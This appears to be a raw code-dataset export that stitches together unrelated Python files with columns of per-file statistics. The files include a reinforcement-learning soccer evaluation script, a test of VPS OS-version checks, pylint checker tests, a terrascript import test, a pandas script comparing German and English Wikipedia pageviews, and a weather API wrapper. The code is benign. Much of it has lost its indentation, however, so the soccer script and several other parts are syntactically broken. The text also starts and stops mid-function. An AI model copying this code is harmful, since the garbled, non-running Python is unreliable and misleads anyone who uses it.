actions_goalies[0] = torch.argmax(action_maac[1], dim=-1)
# print(actions_strikers[0])
policy_strikers, _ = strikers(obs_striker2[:])
policy_goalies, _ = goalies(obs_goalie2[:])
probs_striker = F.softmax(policy_strikers, dim=-1)
probs_goalie = F.softmax(policy_goalies, dim=-1)
actions_strikers[1] = probs_striker.multinomial(1).data.flatten()
actions_goalies[1] = probs_goalie.multinomial(1).data.flatten()
# print(actions_strikers)
actions_striker = torch.cat(actions_strikers, 0)
actions_goalie = torch.cat(actions_goalies, 0)
obs, rewards, dones, _ = env.step(actions_striker, actions_goalie,
order)
obs_striker, obs_goalie, obs_striker2, obs_goalie2 = parse_double(obs)
for i in np.argwhere(dones[0]).flatten():
epsoid += 1
if rewards[1][i] < 0:
records[0] += 1
elif rewards[0][i] < 0:
records[1] += 1
else:
records[2] += 1
    print(records)
    return records
def eval_maacdoubleppo_compete(model_path,
strikers,
goalies,
env,
order='team',
eval_epsoid=200):
maac = AttentionSACDouble.init_from_save(model_path)
# obs_striker, obs_goalie = env.reset(order)
obs_striker, obs_goalie, obs_striker2, obs_goalie2 = parse_double(
env.reset(order))
actions_strikers = [None, None]
actions_goalies = [None, None]
records = [0, 0, 0]
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = (torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = (torch.from_numpy(obs_goalie).float()).to(device)
obs_striker2 = (torch.from_numpy(obs_striker2).float()).to(device)
obs_goalie2 = (torch.from_numpy(obs_goalie2).float()).to(device)
action_maac = maac.step(
(obs_striker, obs_goalie, obs_striker2, obs_goalie2), explore=True)
# print(action_maac)
actions_strikers[0] = torch.argmax(action_maac[0], dim=-1)
actions_goalies[0] = torch.argmax(action_maac[1], dim=-1)
# print(actions_strikers[0])
# policy_strikers, _ = strikers(obs_striker2[:])
# policy_goalies, _ = goalies(obs_goalie2[:])
# probs_striker = F.softmax(policy_strikers, dim=-1)
# probs_goalie = F.softmax(policy_goalies, dim=-1)
actions_strikers[1] = strikers.act(obs_striker2).flatten()
actions_goalies[1] = goalies.act(obs_goalie2).flatten()
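        # The PPO wrappers expose act(), which already returns discrete action
        # ids, so no explicit softmax/multinomial sampling step is needed here
        # (the commented-out lines above show the A2C-style alternative).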
# print(actions_strikers)
actions_striker = torch.cat(actions_strikers, 0)
actions_goalie = torch.cat(actions_goalies, 0)
obs, rewards, dones, _ = env.step(actions_striker, actions_goalie,
order)
obs_striker, obs_goalie, obs_striker2, obs_goalie2 = parse_double(obs)
for i in np.argwhere(dones[0]).flatten():
epsoid += 1
if rewards[1][i] < 0:
records[0] += 1
elif rewards[0][i] < 0:
records[1] += 1
else:
records[2] += 1
    print(records)
    return records
if __name__ == '__main__':
env_path = './env/macos/SoccerTwosBeta.app'
env = SocTwoEnv(env_path, worker_id=0, train_mode=False, render=True)
# net_path = './a2c/ckpt/a2c_step20320000.pth'
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
net_path = './a2c/ckpt_reward_shaping/a2c_step39960000.pth'
# net_path_large = './a2c/ckpt_rs_large/a2cLarge_step36960000.pth'
net_path_large = './a2c/ckpt_wors_2e/a2cLarge_step39960000.pth'
# net_path_large2 = './a2c/ckpt_wors_2e/a2cLarge_step13920000.pth'
net_path_large2 = './a2c/ckpt_rs_large/a2cLarge_step36960000.pth'
ppo_striker = './ppo/ckpt/PPO_strikerSoccerTwos_9920.pth'
ppo_goalie = './ppo/ckpt/PPO_goalieSoccerTwos_9920.pth'
# maac_path = './maac/server/model.pt'
# maac_path = './maac/dup_policy/model.pt'
maacdouble_path = './maac_double/server/model.pt'
maacac_path = './maac_ac/server/model.pt'
# maac_path = './maac/cedl/model.pt'
# maac_path = './maac/cedl_h2/model.pt'
# maac_path = './maac/models/maac/run10/model.pt'
# maac_path = './maac/models/maac/run14/model.pt'
with torch.no_grad():
# policy_striker, policy_goalie = A2C(7).to(device), A2C(5).to(device)
        policy_striker_large, policy_goalie_large = A2CLarge(7).to(
            device), A2CLarge(5).to(device)
        policy_striker_large2, policy_goalie_large2 = A2CLarge(7).to(
            device), A2CLarge(5).to(device)
ckpt_large = torch.load(net_path_large, map_location=device)
policy_striker_large.load_state_dict(ckpt_large['striker_a2c'])
policy_goalie_large.load_state_dict(ckpt_large['goalie_a2c'])
ckpt_large2 = torch.load(net_path_large2, map_location=device)
policy_striker_large2.load_state_dict(ckpt_large2['striker_a2c'])
policy_goalie_large2.load_state_dict(ckpt_large2['goalie_a2c'])
# ckpt = torch.load(net_path, map_location=device)
# policy_striker.load_state_dict(ckpt['striker_a2c'])
# policy_goalie.load_state_dict(ckpt['goalie_a2c'])
ppo_striker = PPO(112, 7, 64, ckpt_path=ppo_striker)
ppo_goalie = PPO(112, 5, 64, ckpt_path=ppo_goalie)
        policy_striker_large.eval()
        policy_goalie_large.eval()
        policy_striker_large2.eval()
        policy_goalie_large2.eval()
# policy_striker.eval()
# policy_goalie.eval()
# eval_with_random_agent(policy_striker,
# policy_goalie,
# env,
# device,
# eval_epsoid=100)
# eval_with_random_agent(policy_striker_large,
# policy_goalie_large,
# env,
# device,
# eval_epsoid=100)
# eval_self_striker_goalie(policy_striker_large,
# policy_goalie_large,
# env,
# device,
# eval_epsoid=100)
# eval_self_complete(policy_striker, policy_goalie, env, device, 'team')
# eval_self_complete(policy_striker_large, policy_striker_large, env,
# device, 'team')
        eval_self_complete(policy_striker_large2, policy_goalie_large2, env,
                           device, 'team')
# eval_agents_compete([policy_striker_large, policy_striker],
# [policy_goalie_large, policy_goalie],
# env,
# device,
# order='team',
# eval_epsoid=100)
# eval_agents_compete([policy_striker_large, policy_striker_large2],
# [policy_goalie_large, policy_goalie_large2],
# env,
# device,
# order='team',
# eval_epsoid=100)
# eval_compete_acppo([policy_striker_large, ppo_striker],
# [policy_goalie_large, ppo_goalie],
# env,
# device,
# order='team',
# eval_epsoid=100)
# eval_maac_with_random(maac_path, env)
# eval_maac_self_compete(maac_path, env)
# eval_maacac_compete(maac_path, policy_striker_large,policy_goalie_large,env)
# eval_maacdoubleac_compete(maacdouble_path, policy_striker_large,
# policy_goalie_large, env)
# eval_maacdoubleppo_compete(maacdouble_path, ppo_striker,
# ppo_goalie, env)
pass
| 36.223011
| 86
| 0.570135
| 2,931
| 25,501
| 4.691914
| 0.05766
| 0.045084
| 0.036649
| 0.040067
| 0.834497
| 0.802283
| 0.762289
| 0.755308
| 0.73313
| 0.709424
| 0
| 0.032626
| 0.318497
| 25,501
| 704
| 87
| 36.223011
| 0.758674
| 0.159955
| 0
| 0.787611
| 0
| 0
| 0.019419
| 0.014072
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026549
| false
| 0.002212
| 0.037611
| 0
| 0.090708
| 0.004425
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d3b5fe9cbe26215c06afe171fa32acab4a36471b
| 2,325
|
py
|
Python
|
teuthology/test/test_vps_os_vers_parameter_checking.py
|
tchaikov/teuthology
|
bda9cb993f372116c804ea49daefda6b816650d5
|
[
"MIT"
] | 1
|
2018-05-17T13:02:42.000Z
|
2018-05-17T13:02:42.000Z
|
teuthology/test/test_vps_os_vers_parameter_checking.py
|
tchaikov/teuthology
|
bda9cb993f372116c804ea49daefda6b816650d5
|
[
"MIT"
] | null | null | null |
teuthology/test/test_vps_os_vers_parameter_checking.py
|
tchaikov/teuthology
|
bda9cb993f372116c804ea49daefda6b816650d5
|
[
"MIT"
] | 2
|
2017-12-21T08:05:49.000Z
|
2021-04-06T09:23:06.000Z
|
from .. import lock
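# A bare attribute container used as a stand-in test context object.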
class Mock: pass
class TestVpsOsVersionParamCheck(object):
def setup(self):
self.fake_ctx = Mock()
self.fake_ctx.machine_type = 'vps'
self.fake_ctx.num_to_lock = 1
self.fake_ctx.lock = False
def test_ubuntu_precise(self):
self.fake_ctx.os_type = 'ubuntu'
self.fake_ctx.os_version = 'precise'
check_value = lock.vps_version_or_type_valid(
self.fake_ctx.machine_type,
self.fake_ctx.os_type,
self.fake_ctx.os_version)
assert check_value
def test_ubuntu_number(self):
self.fake_ctx.os_type = 'ubuntu'
self.fake_ctx.os_version = '12.04'
check_value = lock.vps_version_or_type_valid(
self.fake_ctx.machine_type,
self.fake_ctx.os_type,
self.fake_ctx.os_version)
assert check_value
def test_rhel(self):
self.fake_ctx.os_type = 'rhel'
self.fake_ctx.os_version = '6.5'
check_value = lock.vps_version_or_type_valid(
self.fake_ctx.machine_type,
self.fake_ctx.os_type,
self.fake_ctx.os_version)
assert check_value
def test_mixup(self):
self.fake_ctx.os_type = '6.5'
self.fake_ctx.os_version = 'rhel'
check_value = lock.vps_version_or_type_valid(
self.fake_ctx.machine_type,
self.fake_ctx.os_type,
self.fake_ctx.os_version)
assert not check_value
def test_bad_type(self):
self.fake_ctx.os_type = 'aardvark'
self.fake_ctx.os_version = '6.5'
check_value = lock.vps_version_or_type_valid(
self.fake_ctx.machine_type,
self.fake_ctx.os_type,
self.fake_ctx.os_version)
assert not check_value
def test_bad_version(self):
self.fake_ctx.os_type = 'rhel'
self.fake_ctx.os_version = 'vampire_bat'
check_value = lock.vps_version_or_type_valid(
self.fake_ctx.machine_type,
self.fake_ctx.os_type,
self.fake_ctx.os_version)
assert not check_value
| 34.191176
| 53
| 0.575484
| 298
| 2,325
| 4.107383
| 0.14094
| 0.222222
| 0.305556
| 0.254902
| 0.818627
| 0.784314
| 0.75
| 0.75
| 0.75
| 0.75
| 0
| 0.007256
| 0.347957
| 2,325
| 67
| 54
| 34.701493
| 0.800132
| 0
| 0
| 0.642857
| 0
| 0
| 0.02883
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 1
| 0.125
| false
| 0.017857
| 0.017857
| 0
| 0.178571
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d3b9f871778afa863b086bd919e3e7feaf470222
| 215
|
py
|
Python
|
realtime_api/game/__init__.py
|
mmartin/ogs_api
|
a1ad0753d5922b93bbb27c427f8ee68ebc4a23a3
|
[
"MIT"
] | 4
|
2020-05-01T15:17:21.000Z
|
2021-07-10T05:49:39.000Z
|
realtime_api/game/__init__.py
|
mmartin/ogs_api
|
a1ad0753d5922b93bbb27c427f8ee68ebc4a23a3
|
[
"MIT"
] | null | null | null |
realtime_api/game/__init__.py
|
mmartin/ogs_api
|
a1ad0753d5922b93bbb27c427f8ee68ebc4a23a3
|
[
"MIT"
] | 1
|
2021-02-07T20:33:28.000Z
|
2021-02-07T20:33:28.000Z
|
from .game import game_connect, game_disconnect
from .game import add_game_clock_handler, add_game_move_handler, add_game_undo_requested_handler, add_game_handler
from .game import game_chat, game_pass, game_resume
| 53.75
| 114
| 0.874419
| 35
| 215
| 4.885714
| 0.4
| 0.163743
| 0.245614
| 0.210526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083721
| 215
| 3
| 115
| 71.666667
| 0.86802
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
d3cb5876969848da3acddb0e3a3267d3fc5fdffb
| 2,005
|
py
|
Python
|
rotkehlchen/tests/pylint/test_disallow_not.py
|
coblee/rotki
|
d675f5c2d0df5176337b7b10038524ee74923482
|
[
"BSD-3-Clause"
] | 137
|
2018-03-05T11:53:29.000Z
|
2019-11-03T16:38:42.000Z
|
rotkehlchen/tests/pylint/test_disallow_not.py
|
coblee/rotki
|
d675f5c2d0df5176337b7b10038524ee74923482
|
[
"BSD-3-Clause"
] | 385
|
2018-03-08T12:43:41.000Z
|
2019-11-10T09:15:36.000Z
|
rotkehlchen/tests/pylint/test_disallow_not.py
|
coblee/rotki
|
d675f5c2d0df5176337b7b10038524ee74923482
|
[
"BSD-3-Clause"
] | 59
|
2018-03-08T10:08:27.000Z
|
2019-10-26T11:30:44.000Z
|
import astroid
from tools.pylint import NotBooleanChecker
def test_detect_list_as_nonboolean_not(pylint_test_linter):
checker = NotBooleanChecker(linter=pylint_test_linter)
node = astroid.extract_node("""
a = []
not a #@
""")
checker.visit_unaryop(node)
messages = checker.linter.release_messages()
assert len(messages) == 1
def test_detect_dict_as_nonboolean_not(pylint_test_linter):
checker = NotBooleanChecker(linter=pylint_test_linter)
node = astroid.extract_node("""
a = {}
not a #@
""")
checker.visit_unaryop(node)
messages = checker.linter.release_messages()
assert len(messages) == 1
def test_boolean_does_not_trigger_checker(pylint_test_linter):
checker = NotBooleanChecker(linter=pylint_test_linter)
node = astroid.extract_node("""
a = False
not a #@
""")
checker.visit_unaryop(node)
messages = checker.linter.release_messages()
assert len(messages) == 0
def test_isinstance_does_not_trigger_checker(pylint_test_linter):
checker = NotBooleanChecker(linter=pylint_test_linter)
node = astroid.extract_node("""
a = 5
not isinstance(a, str) #@
""")
checker.visit_unaryop(node)
messages = checker.linter.release_messages()
assert len(messages) == 0
def test_boolean_function_does_not_trigger_checker(pylint_test_linter):
checker = NotBooleanChecker(linter=pylint_test_linter)
node = astroid.extract_node("""
def foo() -> bool:
return True
not foo() #@
""")
checker.visit_unaryop(node)
messages = checker.linter.release_messages()
assert len(messages) == 0
def test_subsscript_function_does_not_crash_checker(pylint_test_linter):
checker = NotBooleanChecker(linter=pylint_test_linter)
node = astroid.extract_node("""
def foo() -> Optional[object]:
return object()
not foo() #@
""")
checker.visit_unaryop(node)
messages = checker.linter.release_messages()
assert len(messages) == 0
| 28.239437
| 72
| 0.707232
| 238
| 2,005
| 5.647059
| 0.180672
| 0.089286
| 0.142857
| 0.102679
| 0.848958
| 0.848958
| 0.848958
| 0.848958
| 0.848958
| 0.848958
| 0
| 0.004284
| 0.185037
| 2,005
| 70
| 73
| 28.642857
| 0.818237
| 0
| 0
| 0.706897
| 0
| 0
| 0.14015
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 1
| 0.103448
| false
| 0
| 0.034483
| 0
| 0.172414
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d3d0bb0cd5f3b726b99ea184a847d04b28bd0297
| 47
|
py
|
Python
|
src/backend/app/api/public/claims/claim/__init__.py
|
aimanow/sft
|
dce87ffe395ae4bd08b47f28e07594e1889da819
|
[
"Apache-2.0"
] | null | null | null |
src/backend/app/api/public/claims/claim/__init__.py
|
aimanow/sft
|
dce87ffe395ae4bd08b47f28e07594e1889da819
|
[
"Apache-2.0"
] | null | null | null |
src/backend/app/api/public/claims/claim/__init__.py
|
aimanow/sft
|
dce87ffe395ae4bd08b47f28e07594e1889da819
|
[
"Apache-2.0"
] | null | null | null |
from . import claim
from . import claim_status
| 15.666667
| 26
| 0.787234
| 7
| 47
| 5.142857
| 0.571429
| 0.555556
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170213
| 47
| 2
| 27
| 23.5
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d3d7bf660ef94028eeaece27b502271d848dab3f
| 844
|
py
|
Python
|
tests/test_provider_unicell_scaffolding.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
tests/test_provider_unicell_scaffolding.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
tests/test_provider_unicell_scaffolding.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# tests/test_provider_unicell_scaffolding.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:26:17 UTC)
def test_provider_import():
import terrascript.provider.unicell.scaffolding
def test_resource_import():
from terrascript.resource.unicell.scaffolding import scaffolding_resource
def test_datasource_import():
from terrascript.data.unicell.scaffolding import scaffolding_data_source
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.unicell.scaffolding
#
# t = terrascript.provider.unicell.scaffolding.scaffolding()
# s = str(t)
#
# assert 'https://github.com/unicell/terraform-provider-scaffolding' in s
# assert '0.0.2' in s
| 29.103448
| 80
| 0.767773
| 108
| 844
| 5.861111
| 0.527778
| 0.170616
| 0.164297
| 0.175355
| 0.135861
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020747
| 0.143365
| 844
| 28
| 81
| 30.142857
| 0.854772
| 0.61019
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035714
| 0
| 1
| 0.5
| true
| 0
| 1
| 0
| 1.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
31082e8b64adbf6273c8705935c2c988ca3cf3ff
| 4,598
|
py
|
Python
|
EnglishWiki/COVID-19 pandemic in Germany/tables.py
|
Astruj/Regional-English-Wiki
|
2930765f06b6dbd1ade2004522f38f4d2fd08156
|
[
"MIT"
] | null | null | null |
EnglishWiki/COVID-19 pandemic in Germany/tables.py
|
Astruj/Regional-English-Wiki
|
2930765f06b6dbd1ade2004522f38f4d2fd08156
|
[
"MIT"
] | null | null | null |
EnglishWiki/COVID-19 pandemic in Germany/tables.py
|
Astruj/Regional-English-Wiki
|
2930765f06b6dbd1ade2004522f38f4d2fd08156
|
[
"MIT"
] | null | null | null |
#import csv
from matplotlib import pyplot as plt
import pandas as pd
import csv
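# Compares German vs English COVID-19 Wikipedia article categories: average
# pageviews, pageviews per editor, average revisions, and revisions per
# editor, each written out as a small CSV table.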
df = pd.read_csv ('de_data.csv')
de_articles = list(df['article'])
pageviews1 = list(df['Pageviews'])
numArticles1 = len(de_articles)
temp = 0
for i in range(0,numArticles1):
temp = temp + pageviews1[i]
avg1 = temp/numArticles1
df = pd.read_csv ('en_data.csv')
en_articles = list(df['article'])
pageviews2 = list(df['pageviews'])
numArticles2 = len(en_articles)
temp = 0
for i in range(0,numArticles2):
temp = temp + pageviews2[i]
avg2 = temp/numArticles2
parameters = ['Article','Average pageviews in a category']
filename = "averagePageviewsTable1.csv"
with open(filename, "w+") as f:
writer = csv.writer(f)
writer.writerow(parameters)
row = ['German', avg1]
writer.writerow(row)
row = []
writer.writerow(row)
writer.writerow(row)
row = ['English', avg2]
writer.writerow(row)
################
###################
#pgviewsPerEditor
###################
##################
df = pd.read_csv ('de_data.csv')
de_articles = list(df['article'])
pageviews = list(df['Pageviews'])
numEditors = list(df['Number Of Unique Editors'])
ratio1 = []
for i in range(0,len(pageviews)):
ratio1.append(pageviews[i]/numEditors[i])
print(ratio1)
de_len = len(ratio1)
print(de_len)
df = pd.read_csv('en_data.csv')
en_articles = list(df['article'])
pageviews = list(df['pageviews'])
numEditors = list(df['numEditors'])
ratio2 = []
for i in range(0,len(pageviews)):
ratio2.append(pageviews[i]/numEditors[i])
en_len = len(ratio2)
print(ratio2)
print(en_len)
parameters = ['Article','Ratio pageviews/editors']
filename = "de_pgviewsPerEditorTable1.csv"
with open(filename, "w+") as f:
writer = csv.writer(f)
writer.writerow(parameters)
x = 0
for i in range(0,de_len):
row = [de_articles[i],ratio1[i]]
x = x +ratio1[i]
writer.writerow(row)
row = ['Average', x/de_len]
writer.writerow(row)
parameters = ['Article','Ratio pageviews/editors']
filename = "en_pgviewsPerEditorTable1.csv"
with open(filename, "w+") as f:
writer = csv.writer(f)
writer.writerow(parameters)
x = 0
for i in range(0,en_len):
row = [en_articles[i],ratio2[i]]
x = x +ratio2[i]
writer.writerow(row)
row = ['Average', x/en_len]
writer.writerow(row)
###############
#############
df = pd.read_csv ('de_data.csv')
de_articles = list(df['article'])
revisions1 = list(df['Revisions'])
numArticles1 = len(de_articles)
temp = 0
for i in range(0,numArticles1):
temp = temp + revisions1[i]
avg1 = temp/numArticles1
df = pd.read_csv ('en_data.csv')
en_articles = list(df['article'])
revisions2 = list(df['revisions'])
numArticles2 = len(en_articles)
temp = 0
for i in range(0,numArticles2):
temp = temp + revisions2[i]
avg2 = temp/numArticles2
parameters = ['Article','Average revisions in a category']
filename = "averageRevisionsTable1.csv"
with open(filename, "w+") as f:
writer = csv.writer(f)
writer.writerow(parameters)
row = ['German', avg1]
writer.writerow(row)
row = []
writer.writerow(row)
writer.writerow(row)
row = ['English', avg2]
writer.writerow(row)
####
#revisionsPerEDITOR
#########
df = pd.read_csv ('de_data.csv')
de_articles = list(df['article'])
revisions = list(df['Revisions'])
numEditors = list(df['Number Of Unique Editors'])
ratio1 = []
for i in range(0,len(revisions)):
ratio1.append(revisions[i]/numEditors[i])
print(ratio1)
de_len = len(ratio1)
print(de_len)
df = pd.read_csv('en_data.csv')
en_articles = list(df['article'])
revisions = list(df['revisions'])
numEditors = list(df['numEditors'])
ratio2 = []
for i in range(0,len(revisions)):
ratio2.append(revisions[i]/numEditors[i])
en_len = len(ratio2)
print(ratio2)
print(en_len)
parameters = ['Article','Ratio revisions/editors']
filename = "de_revisionsPerEditorTable1.csv"
with open(filename, "w+") as f:
writer = csv.writer(f)
writer.writerow(parameters)
x = 0
for i in range(0,de_len):
row = [de_articles[i],ratio1[i]]
x = x +ratio1[i]
writer.writerow(row)
row = ['Average', x/de_len]
writer.writerow(row)
parameters = ['Article','Ratio revisions/editors']
filename = "en_revisionsPerEditorTable1.csv"
with open(filename, "w+") as f:
writer = csv.writer(f)
writer.writerow(parameters)
x = 0
for i in range(0,en_len):
row = [en_articles[i],ratio2[i]]
x = x +ratio2[i]
writer.writerow(row)
row = ['Average', x/en_len]
writer.writerow(row)
##########
| 23.340102
| 59
| 0.64876
| 626
| 4,598
| 4.682109
| 0.103834
| 0.105084
| 0.092801
| 0.045036
| 0.873422
| 0.852951
| 0.820198
| 0.777209
| 0.777209
| 0.777209
| 0
| 0.020575
| 0.175511
| 4,598
| 197
| 60
| 23.340102
| 0.752572
| 0.009569
| 0
| 0.816327
| 0
| 0
| 0.162339
| 0.038835
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.020408
| 0
| 0.020408
| 0.054422
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
31312f22f1f3e36d5722f1a34f233e808f8b603f
| 167
|
py
|
Python
|
qiskit_utils/__init__.py
|
mgrzesiuk/qiskit-utils
|
ba29d31221815e4690aec4f7abbcc2e6d0747c80
|
[
"MIT"
] | null | null | null |
qiskit_utils/__init__.py
|
mgrzesiuk/qiskit-utils
|
ba29d31221815e4690aec4f7abbcc2e6d0747c80
|
[
"MIT"
] | null | null | null |
qiskit_utils/__init__.py
|
mgrzesiuk/qiskit-utils
|
ba29d31221815e4690aec4f7abbcc2e6d0747c80
|
[
"MIT"
] | null | null | null |
from qiskit_utils.insert import insert_instruction
from qiskit_utils.enhanced_circuit import QuantumCircuitEnhanced
from qiskit_utils.parse_result import parse_result
| 41.75
| 64
| 0.91018
| 22
| 167
| 6.590909
| 0.5
| 0.206897
| 0.310345
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071856
| 167
| 3
| 65
| 55.666667
| 0.935484
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
31559566b03dbab432dfa66edb7d6c737c1fe772
| 7,630
|
py
|
Python
|
src/weather/weather.py
|
SzymonWilczewski/weather-project-tdd
|
edd92e3ae198496331e7140f9c8a008d56f9528c
|
[
"MIT"
] | null | null | null |
src/weather/weather.py
|
SzymonWilczewski/weather-project-tdd
|
edd92e3ae198496331e7140f9c8a008d56f9528c
|
[
"MIT"
] | null | null | null |
src/weather/weather.py
|
SzymonWilczewski/weather-project-tdd
|
edd92e3ae198496331e7140f9c8a008d56f9528c
|
[
"MIT"
] | null | null | null |
from src.weather.weather_data import WeatherData
class Weather:
def __init__(self):
self.data = WeatherData()
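    # Every accessor below follows the same pattern: fetch the raw weather
    # payload via WeatherData, extract the field of interest (temperatures
    # are converted from Kelvin to Celsius and rounded to 2 places), and
    # normalise failures to TypeError/ValueError with a short message.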
def current_temperature_by_city_name(self, city_name):
try:
weather = self.data.get_current_weather_by_city_name(city_name)
return round(weather["main"]["temp"] - 273.15, 2)
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def current_temperature_by_city_id(self, city_id):
try:
weather = self.data.get_current_weather_by_city_id(city_id)
return round(weather["main"]["temp"] - 273.15, 2)
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def current_pressure_by_city_name(self, city_name):
try:
weather = self.data.get_current_weather_by_city_name(city_name)
return weather["main"]["pressure"]
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def current_pressure_by_city_id(self, city_id):
try:
weather = self.data.get_current_weather_by_city_id(city_id)
return weather["main"]["pressure"]
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def current_humidity_by_city_name(self, city_name):
try:
weather = self.data.get_current_weather_by_city_name(city_name)
return weather["main"]["humidity"]
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def current_humidity_by_city_id(self, city_id):
try:
weather = self.data.get_current_weather_by_city_id(city_id)
return weather["main"]["humidity"]
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_temperature_forecast_by_city_name(self, city_name):
try:
weather = self.data.get_week_weather_by_city_name(city_name)
temperature = []
for day in weather["list"]:
temperature.append(round(day["temp"]["day"] - 273.15, 2))
return temperature
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_temperature_forecast_by_city_id(self, city_id):
try:
weather = self.data.get_week_weather_by_city_id(city_id)
temperature = []
for day in weather["list"]:
temperature.append(round(day["temp"]["day"] - 273.15, 2))
return temperature
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_pressure_forecast_by_city_name(self, city_name):
try:
weather = self.data.get_week_weather_by_city_name(city_name)
pressure = []
for day in weather["list"]:
pressure.append(day["pressure"])
return pressure
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_pressure_forecast_by_city_id(self, city_id):
try:
weather = self.data.get_week_weather_by_city_id(city_id)
pressure = []
for day in weather["list"]:
pressure.append(day["pressure"])
return pressure
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_humidity_forecast_by_city_name(self, city_name):
try:
weather = self.data.get_week_weather_by_city_name(city_name)
humidity = []
for day in weather["list"]:
humidity.append(day["humidity"])
return humidity
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_humidity_forecast_by_city_id(self, city_id):
try:
weather = self.data.get_week_weather_by_city_id(city_id)
humidity = []
for day in weather["list"]:
humidity.append(day["humidity"])
return humidity
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_average_temperature_by_city_name(self, city_name):
try:
weather = self.data.get_week_weather_by_city_name(city_name)
temperature = []
for day in weather["list"]:
